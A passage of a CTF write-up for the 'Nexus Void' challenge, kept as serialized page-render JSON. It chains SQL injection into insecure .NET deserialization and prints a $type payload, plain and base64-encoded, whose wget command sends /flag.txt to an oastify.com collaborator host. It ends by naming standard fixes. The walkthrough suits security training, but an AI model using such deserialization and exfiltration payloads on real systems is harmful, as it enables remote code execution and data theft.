",{"type":32,"tag":89,"props":4717,"children":4718},{"style":3393},[4719],{"type":37,"value":4720},"\\\"",{"type":32,"tag":89,"props":4722,"children":4723},{"style":124},[4724],{"type":37,"value":240},{"type":32,"tag":89,"props":4726,"children":4727},{"style":186},[4728],{"type":37,"value":4729},"_command",{"type":32,"tag":89,"props":4731,"children":4732},{"style":124},[4733],{"type":37,"value":249},{"type":32,"tag":89,"props":4735,"children":4736},{"style":3393},[4737],{"type":37,"value":4720},{"type":32,"tag":89,"props":4739,"children":4740},{"style":180},[4741],{"type":37,"value":183},{"type":32,"tag":89,"props":4743,"children":4744},{"style":124},[4745],{"type":37,"value":4636},{"type":32,"tag":89,"props":4747,"children":4748},{"class":91,"line":1027},[4749,4754,4758,4763],{"type":32,"tag":89,"props":4750,"children":4751},{"style":159},[4752],{"type":37,"value":4753},"                        RedirectStandardOutput",{"type":32,"tag":89,"props":4755,"children":4756},{"style":124},[4757],{"type":37,"value":156},{"type":32,"tag":89,"props":4759,"children":4760},{"style":143},[4761],{"type":37,"value":4762}," true",{"type":32,"tag":89,"props":4764,"children":4765},{"style":124},[4766],{"type":37,"value":4636},{"type":32,"tag":89,"props":4768,"children":4769},{"class":91,"line":1036},[4770,4775,4779,4783],{"type":32,"tag":89,"props":4771,"children":4772},{"style":159},[4773],{"type":37,"value":4774},"                        RedirectStandardError",{"type":32,"tag":89,"props":4776,"children":4777},{"style":124},[4778],{"type":37,"value":156},{"type":32,"tag":89,"props":4780,"children":4781},{"style":143},[4782],{"type":37,"value":4762},{"type":32,"tag":89,"props":4784,"children":4785},{"style":124},[4786],{"type":37,"value":4636},{"type":32,"tag":89,"props":4788,"children":4789},{"class":91,"line":1071},[4790,4795,4799],{"type":32,"tag":89,"props":4791,"children":4792},{"style":159},[4793],{"type":37,"value":4794},"                        
UseShellExecute",{"type":32,"tag":89,"props":4796,"children":4797},{"style":124},[4798],{"type":37,"value":156},{"type":32,"tag":89,"props":4800,"children":4801},{"style":143},[4802],{"type":37,"value":4803}," false\n",{"type":32,"tag":89,"props":4805,"children":4806},{"class":91,"line":1080},[4807],{"type":32,"tag":89,"props":4808,"children":4809},{"style":124},[4810],{"type":37,"value":4811},"                    };\n",{"type":32,"tag":89,"props":4813,"children":4814},{"class":91,"line":1088},[4815,4820,4824,4829,4833,4837],{"type":32,"tag":89,"props":4816,"children":4817},{"style":159},[4818],{"type":37,"value":4819},"                    p",{"type":32,"tag":89,"props":4821,"children":4822},{"style":124},[4823],{"type":37,"value":167},{"type":32,"tag":89,"props":4825,"children":4826},{"style":159},[4827],{"type":37,"value":4828},"StartInfo",{"type":32,"tag":89,"props":4830,"children":4831},{"style":124},[4832],{"type":37,"value":156},{"type":32,"tag":89,"props":4834,"children":4835},{"style":159},[4836],{"type":37,"value":4580},{"type":32,"tag":89,"props":4838,"children":4839},{"style":124},[4840],{"type":37,"value":1866},{"type":32,"tag":89,"props":4842,"children":4843},{"class":91,"line":1118},[4844,4848,4852,4857],{"type":32,"tag":89,"props":4845,"children":4846},{"style":159},[4847],{"type":37,"value":4819},{"type":32,"tag":89,"props":4849,"children":4850},{"style":124},[4851],{"type":37,"value":167},{"type":32,"tag":89,"props":4853,"children":4854},{"style":118},[4855],{"type":37,"value":4856},"Start",{"type":32,"tag":89,"props":4858,"children":4859},{"style":124},[4860],{"type":37,"value":208},{"type":32,"tag":89,"props":4862,"children":4863},{"class":91,"line":1162},[4864,4869,4873,4877,4881,4886,4890,4895],{"type":32,"tag":89,"props":4865,"children":4866},{"style":159},[4867],{"type":37,"value":4868},"                    
output",{"type":32,"tag":89,"props":4870,"children":4871},{"style":124},[4872],{"type":37,"value":156},{"type":32,"tag":89,"props":4874,"children":4875},{"style":159},[4876],{"type":37,"value":4528},{"type":32,"tag":89,"props":4878,"children":4879},{"style":124},[4880],{"type":37,"value":167},{"type":32,"tag":89,"props":4882,"children":4883},{"style":159},[4884],{"type":37,"value":4885},"StandardOutput",{"type":32,"tag":89,"props":4887,"children":4888},{"style":124},[4889],{"type":37,"value":167},{"type":32,"tag":89,"props":4891,"children":4892},{"style":118},[4893],{"type":37,"value":4894},"ReadToEnd",{"type":32,"tag":89,"props":4896,"children":4897},{"style":124},[4898],{"type":37,"value":208},{"type":32,"tag":89,"props":4900,"children":4901},{"class":91,"line":1230},[4902],{"type":32,"tag":89,"props":4903,"children":4904},{"style":124},[4905],{"type":37,"value":4906},"                }\n",{"type":32,"tag":89,"props":4908,"children":4909},{"class":91,"line":1270},[4910,4915,4919,4923],{"type":32,"tag":89,"props":4911,"children":4912},{"style":124},[4913],{"type":37,"value":4914},"                
[",{"type":32,"tag":89,"props":4916,"children":4917},{"style":106},[4918],{"type":37,"value":292},{"type":32,"tag":89,"props":4920,"children":4921},{"style":295},[4922],{"type":37,"value":167},{"type":32,"tag":89,"props":4924,"children":4925},{"style":124},[4926],{"type":37,"value":302},{"type":32,"tag":89,"props":4928,"children":4929},{"class":91,"line":1279},[4930],{"type":32,"tag":89,"props":4931,"children":4932},{"style":124},[4933],{"type":37,"value":1077},{"type":32,"tag":89,"props":4935,"children":4936},{"class":91,"line":1288},[4937],{"type":32,"tag":89,"props":4938,"children":4939},{"style":124},[4940],{"type":37,"value":1276},{"type":32,"tag":89,"props":4942,"children":4943},{"class":91,"line":1296},[4944],{"type":32,"tag":89,"props":4945,"children":4946},{"emptyLinePlaceholder":275},[4947],{"type":37,"value":278},{"type":32,"tag":89,"props":4949,"children":4950},{"class":91,"line":1354},[4951],{"type":32,"tag":89,"props":4952,"children":4953},{"emptyLinePlaceholder":275},[4954],{"type":37,"value":278},{"type":32,"tag":89,"props":4956,"children":4957},{"class":91,"line":1406},[4958],{"type":32,"tag":89,"props":4959,"children":4960},{"style":124},[4961],{"type":37,"value":1648},{"type":32,"tag":89,"props":4963,"children":4964},{"class":91,"line":1435},[4965],{"type":32,"tag":89,"props":4966,"children":4967},{"style":124},[4968],{"type":37,"value":311},{"type":32,"tag":46,"props":4970,"children":4971},{},[4972,4974,4979],{"type":37,"value":4973},"We can see that it is when setting the value of the ",{"type":32,"tag":85,"props":4975,"children":4977},{"className":4976},[],[4978],{"type":37,"value":3926},{"type":37,"value":4980}," attribute that the system function is called. 
So, our goal now is to exploit deserialization with an instance of this class where we have set the command with our payload.",{"type":32,"tag":46,"props":4982,"children":4983},{},[4984],{"type":37,"value":4985},"This is what we will see in the next chapter.",{"type":32,"tag":39,"props":4987,"children":4989},{"id":4988},"exploitation",[4990],{"type":37,"value":4991},"Exploitation",{"type":32,"tag":46,"props":4993,"children":4994},{},[4995],{"type":37,"value":4996},"Every query is vulnerable to SQL injection, and the application unsafely deserializes a value it reads back from the database, which allows remote code execution (RCE). Therefore, we can use the SQLi to control the data that is later deserialized, and so reach RCE.",{"type":32,"tag":4998,"props":4999,"children":5001},{"id":5000},"create-a-serialized-payload",[5002],{"type":37,"value":5003},"Create a serialized payload",{"type":32,"tag":46,"props":5005,"children":5006},{},[5007,5009,5014],{"type":37,"value":5008},"To begin, we need to create a serialized payload that will contain an instance of the ",{"type":32,"tag":85,"props":5010,"children":5012},{"className":5011},[],[5013],{"type":37,"value":4247},{"type":37,"value":5015}," class, which will set a value to the command.",{"type":32,"tag":46,"props":5017,"children":5018},{},[5019],{"type":37,"value":5020},"Our payload will be as follows:",{"type":32,"tag":74,"props":5022,"children":5023},{"lang":3313},[5024],{"type":32,"tag":79,"props":5025,"children":5028},{"code":5026,"language":3313,"meta":7,"className":5027,"style":7},"{\n\"$type\": \"Nexus_Void.Helpers.StatusCheckHelper, Nexus_Void\",\n\"command\": \"wget  --header='Content-type: multipart/form-data boundary=FILEUPLOAD' --post-file /flag.txt http://aesz1k6cgyylzco4zrdoyv12ltrqfq3f.oastify.com\"\n}\n","language-json shiki shiki-themes 
vitesse-dark",[5029],{"type":32,"tag":85,"props":5030,"children":5031},{"__ignoreMap":7},[5032,5039,5078,5111],{"type":32,"tag":89,"props":5033,"children":5034},{"class":91,"line":92},[5035],{"type":32,"tag":89,"props":5036,"children":5037},{"style":124},[5038],{"type":37,"value":136},{"type":32,"tag":89,"props":5040,"children":5041},{"class":91,"line":102},[5042,5047,5052,5056,5061,5065,5070,5074],{"type":32,"tag":89,"props":5043,"children":5045},{"style":5044},"--shiki-default:#B8A96577",[5046],{"type":37,"value":183},{"type":32,"tag":89,"props":5048,"children":5050},{"style":5049},"--shiki-default:#B8A965",[5051],{"type":37,"value":3750},{"type":32,"tag":89,"props":5053,"children":5054},{"style":5044},[5055],{"type":37,"value":183},{"type":32,"tag":89,"props":5057,"children":5058},{"style":124},[5059],{"type":37,"value":5060},":",{"type":32,"tag":89,"props":5062,"children":5063},{"style":180},[5064],{"type":37,"value":3169},{"type":32,"tag":89,"props":5066,"children":5067},{"style":186},[5068],{"type":37,"value":5069},"Nexus_Void.Helpers.StatusCheckHelper, Nexus_Void",{"type":32,"tag":89,"props":5071,"children":5072},{"style":180},[5073],{"type":37,"value":183},{"type":32,"tag":89,"props":5075,"children":5076},{"style":124},[5077],{"type":37,"value":4636},{"type":32,"tag":89,"props":5079,"children":5080},{"class":91,"line":130},[5081,5085,5089,5093,5097,5101,5106],{"type":32,"tag":89,"props":5082,"children":5083},{"style":5044},[5084],{"type":37,"value":183},{"type":32,"tag":89,"props":5086,"children":5087},{"style":5049},[5088],{"type":37,"value":3926},{"type":32,"tag":89,"props":5090,"children":5091},{"style":5044},[5092],{"type":37,"value":183},{"type":32,"tag":89,"props":5094,"children":5095},{"style":124},[5096],{"type":37,"value":5060},{"type":32,"tag":89,"props":5098,"children":5099},{"style":180},[5100],{"type":37,"value":3169},{"type":32,"tag":89,"props":5102,"children":5103},{"style":186},[5104],{"type":37,"value":5105},"wget  --header='Content-type: 
multipart/form-data boundary=FILEUPLOAD' --post-file /flag.txt http://aesz1k6cgyylzco4zrdoyv12ltrqfq3f.oastify.com",{"type":32,"tag":89,"props":5107,"children":5108},{"style":180},[5109],{"type":37,"value":5110},"\"\n",{"type":32,"tag":89,"props":5112,"children":5113},{"class":91,"line":139},[5114],{"type":32,"tag":89,"props":5115,"children":5116},{"style":124},[5117],{"type":37,"value":311},{"type":32,"tag":46,"props":5119,"children":5120},{},[5121],{"type":37,"value":5122},"Here are some details about this payload:",{"type":32,"tag":5124,"props":5125,"children":5128},"img",{"width":5126,"src":5127},950,"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704406996/writeups/nexus-void/payload_detail.webp",[],{"type":32,"tag":46,"props":5130,"children":5131},{},[5132,5134,5139,5141,5146],{"type":37,"value":5133},"The value of ",{"type":32,"tag":85,"props":5135,"children":5137},{"className":5136},[],[5138],{"type":37,"value":3750},{"type":37,"value":5140}," will allow us to target the instance of the class that will be deserialized. 
Then we set the attribute ",{"type":32,"tag":85,"props":5142,"children":5144},{"className":5143},[],[5145],{"type":37,"value":3926},{"type":37,"value":5147}," of our instance with our command to be executed.",{"type":32,"tag":74,"props":5149,"children":5150},{"lang":3519},[5151],{"type":32,"tag":79,"props":5152,"children":5154},{"code":5153},"ewoiJHR5cGUiOiAiTmV4dXNfVm9pZC5IZWxwZXJzLlN0YXR1c0NoZWNrSGVscGVyLCBOZXh1c19Wb2lkIiwKImNvbW1hbmQiOiAid2dldCAgLS1oZWFkZXI9Q29udGVudC10eXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhIGJvdW5kYXJ5PUZJTEVVUExPQUQgLS1wb3N0LWZpbGUgL2ZsYWcudHh0IFtodHRwOi8vYWVzejFrNmNneXlsemNvNHpyZG95djEybHRycWZxM2Yub2FzdGlmeS5jb21dKGh0dHA6Ly9hZXN6MWs2Y2d5eWx6Y280enJkb3l2MTJsdHJxZnEzZi5vYXN0aWZ5LmNvbS8pIgp9Cg==\n",[5155],{"type":32,"tag":85,"props":5156,"children":5157},{"__ignoreMap":7},[5158],{"type":37,"value":5153},{"type":32,"tag":4998,"props":5160,"children":5162},{"id":5161},"update-the-database",[5163],{"type":37,"value":5164},"Update the database",{"type":32,"tag":46,"props":5166,"children":5167},{},[5168],{"type":37,"value":5169},"The deserialization is triggered when the Wishlist is retrieved. 
The wishlist is specific to our account, so we need to start by adding a product to our wishlist, the first one for example.",{"type":32,"tag":46,"props":5171,"children":5172},{},[5173],{"type":37,"value":5174},"After adding the product with ID 1 to our wishlist, we need to update the database to change the value of the data for our wishlist.",{"type":32,"tag":52,"props":5176,"children":5178},{"imgSrc":5177},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499801/writeups/nexus-void/favorites_frontend.webp",[],{"type":32,"tag":46,"props":5180,"children":5181},{},[5182],{"type":37,"value":5183},"The associated query is as follows:",{"type":32,"tag":52,"props":5185,"children":5187},{"imgSrc":5186},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499797/writeups/nexus-void/request_add_elmt_wishlist.webp",[],{"type":32,"tag":46,"props":5189,"children":5190},{},[5191],{"type":37,"value":5192},"If we go to the wishlist page, we can see the product added to the list.",{"type":32,"tag":52,"props":5194,"children":5196},{"imgSrc":5195},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499793/writeups/nexus-void/wish_list_frontend.webp",[],{"type":32,"tag":46,"props":5198,"children":5199},{},[5200,5202,5207],{"type":37,"value":5201},"It is this product that we will pollute. 
If we remember the deserialization part, it executes it from the ",{"type":32,"tag":85,"props":5203,"children":5205},{"className":5204},[],[5206],{"type":37,"value":826},{"type":37,"value":5208}," value of the wishlist result.",{"type":32,"tag":74,"props":5210,"children":5211},{"lang":76},[5212],{"type":32,"tag":79,"props":5213,"children":5215},{"code":5214,"language":76,"meta":7,"className":82,"style":7},"List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n",[5216],{"type":32,"tag":85,"props":5217,"children":5218},{"__ignoreMap":7},[5219],{"type":32,"tag":89,"props":5220,"children":5221},{"class":91,"line":92},[5222,5226,5230,5234,5238,5242,5246,5250,5254,5258,5262,5266,5270,5274],{"type":32,"tag":89,"props":5223,"children":5224},{"style":112},[5225],{"type":37,"value":2287},{"type":32,"tag":89,"props":5227,"children":5228},{"style":124},[5229],{"type":37,"value":853},{"type":32,"tag":89,"props":5231,"children":5232},{"style":112},[5233],{"type":37,"value":858},{"type":32,"tag":89,"props":5235,"children":5236},{"style":124},[5237],{"type":37,"value":863},{"type":32,"tag":89,"props":5239,"children":5240},{"style":118},[5241],{"type":37,"value":868},{"type":32,"tag":89,"props":5243,"children":5244},{"style":124},[5245],{"type":37,"value":156},{"type":32,"tag":89,"props":5247,"children":5248},{"style":159},[5249],{"type":37,"value":877},{"type":32,"tag":89,"props":5251,"children":5252},{"style":124},[5253],{"type":37,"value":167},{"type":32,"tag":89,"props":5255,"children":5256},{"style":118},[5257],{"type":37,"value":886},{"type":32,"tag":89,"props":5259,"children":5260},{"style":124},[5261],{"type":37,"value":357},{"type":32,"tag":89,"props":5263,"children":5264},{"style":159},[5265],{"type":37,"value":777},{"type":32,"tag":89,"props":5267,"children":5268},{"style":124},[5269],{"type":37,"value":167},{"type":32,"tag":89,"props":5271,"children":5272},{"style":159},[5273],{"type":37,"value":826},{"type":32,"tag":89,"props":5275,"children":5
276},{"style":124},[5277],{"type":37,"value":907},{"type":32,"tag":46,"props":5279,"children":5280},{},[5281,5283,5288],{"type":37,"value":5282},"So we need to update the ",{"type":32,"tag":85,"props":5284,"children":5286},{"className":5285},[],[5287],{"type":37,"value":826},{"type":37,"value":5289}," value of our wishlist to contain our serialized payload.",{"type":32,"tag":46,"props":5291,"children":5292},{},[5293],{"type":37,"value":5294},"We can therefore use our previous request.",{"type":32,"tag":46,"props":5296,"children":5297},{},[5298],{"type":32,"tag":5299,"props":5300,"children":5301},"em",{},[5302],{"type":37,"value":5303},"Note: It is possible to chain SQL queries in our injection.",{"type":32,"tag":52,"props":5305,"children":5307},{"imgSrc":5306},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499778/writeups/nexus-void/request_exploit_detail.webp",[],{"type":32,"tag":46,"props":5309,"children":5310},{},[5311],{"type":37,"value":5312},"After that, we can see in the docker logs that we have successfully executed our update query.",{"type":32,"tag":52,"props":5314,"children":5316},{"imgSrc":5315},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499783/writeups/nexus-void/docker_log.webp",[],{"type":32,"tag":46,"props":5318,"children":5319},{},[5320],{"type":37,"value":5321},"We just need to refresh the page that lists our wishlist, which will execute our command. 
We can then see that our Burp Collaborator endpoint has received the flag. Both links of this chain have standard fixes: parameterized queries instead of SQL strings built by interpolation, and a deserializer that does not instantiate types named by a $type field in stored data (or restricts them to an allow-list).",{"type":32,"tag":52,"props":5323,"children":5325},{"imgSrc":5324},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499788/writeups/nexus-void/flag_collab.webp",[],{"type":32,"tag":5327,"props":5328,"children":5329},"style",{},[5330],{"type":37,"value":5331},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":102,"depth":92,"links":5333},[5334,5335,5336,5337],{"id":41,"depth":102,"text":44},{"id":59,"depth":102,"text":62},{"id":1698,"depth":102,"text":1701},{"id":4988,"depth":102,"text":4991},"markdown","content:writeups:nexus-void.md","content","writeups/nexus-void.md","writeups/nexus-void","md",1749027224529]